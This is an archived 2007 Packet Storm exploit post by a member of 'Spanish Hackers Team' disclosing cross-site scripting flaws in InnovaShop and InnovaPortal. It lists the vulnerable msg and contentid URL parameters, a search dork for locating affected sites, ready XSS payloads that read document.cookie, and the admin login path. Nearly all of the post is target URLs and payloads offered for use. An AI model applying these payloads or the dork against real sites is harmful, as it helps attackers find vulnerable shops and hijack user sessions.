Lucene search
JosSPACKETSTORM:60113HistoryOct 15, 2007 - 12:00 a.m.
innovashop-xss.txt
2007-10-1500:00:00
JosS
packetstormsecurity.com
18
`# InnovaShop® (mgs.jps) Cross Siting Scripting
# Download:
# http://www.innovaage.com/
# http://www.innovaportal.com/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Site developed by InnovaAge®" / "Powered by InnovaPortal©"
# Stop lammer
# Exploit In (XSS):
http://www.server/path/msg.jsp?msg=[XSS]
http://www.server/path/tc/contents/home001.jsp?contentid=[XSS]
http://www.server/innovashop/msg.jsp?msg=[XSS]
http://www.server/innovashop/tc/contents/home001.jsp?contentid=[XSS]
....all...
# Cross Siting Scripting (Code):
<script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
# Admin Login:
http://server/admin/
//---------------------------------------\\
Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández
_________________________________________________________________
Grandes éxitos, superhéroes, imitaciones, cine y TV...
http://es.msn.kiwee.com/ Lo mejor para tu móvil.
`